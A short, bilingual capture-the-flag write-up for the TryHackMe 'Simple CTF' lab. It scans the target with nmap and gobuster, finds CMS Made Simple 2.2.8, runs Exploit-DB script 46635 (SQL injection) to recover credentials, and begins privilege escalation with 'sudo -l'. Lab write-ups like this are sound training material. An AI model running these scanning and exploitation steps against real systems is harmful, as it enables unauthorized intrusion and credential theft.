【THM】Simple CTF-Practice
【THM】Simple CTF-Practice
hihopkc本文相关的TryHackMe实验房间链接:https://tryhackme.com/room/easyctf
Difficulty: Easy
端口扫描
1 | nmap -p- -sC -sV -T4 10.10.246.59 |
From our results, we can see ports 21 (FTP), 80 (HTTP), and 2222 (SSH) are open.
First, let’s just browse to the IP and see what we get
We find it is the default Apache2 page, not much more to go off of here.
1 | gobuster dir --url http://10.10.246.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt |
Using the medium wordlist we supplied, gobuster was able to find there is a webpage at “/simple”. Let’s try browsing to it now and see what we find
Here we can see this is a default page for something called “CMS Made Simple” and if we look in the bottom corner we can see it is version 2.2.8.
Let’s see if there is anything online about this particular version by simply going to Google and searching “CMS Made Simple 2.2.8 exploit”.
https://www.exploit-db.com/exploits/46635
The exploit is a python script so I copied and pasted into a .py document on my attack box.
或者
运行的时候发现少了-u这个参数
此脚本在 CMS 站点上执行 SQLi,其目标是返回其用户凭据
1 | python 46635.py -u http://10.10.246.59/simple |
不知道为什么我爆破的和wp不一样
1 | [+] Salt for password found: 1dac0d92e9fa6bb2 |
Bingo! We got a username and a cracked password returned from the exploit.
ssh
Is there any other user in the home directory? What’s its name?
answer:
提权
On to privileged escalation! First I like to start off with running “sudo -l” to see what my current user can run.
1 | sudo -l |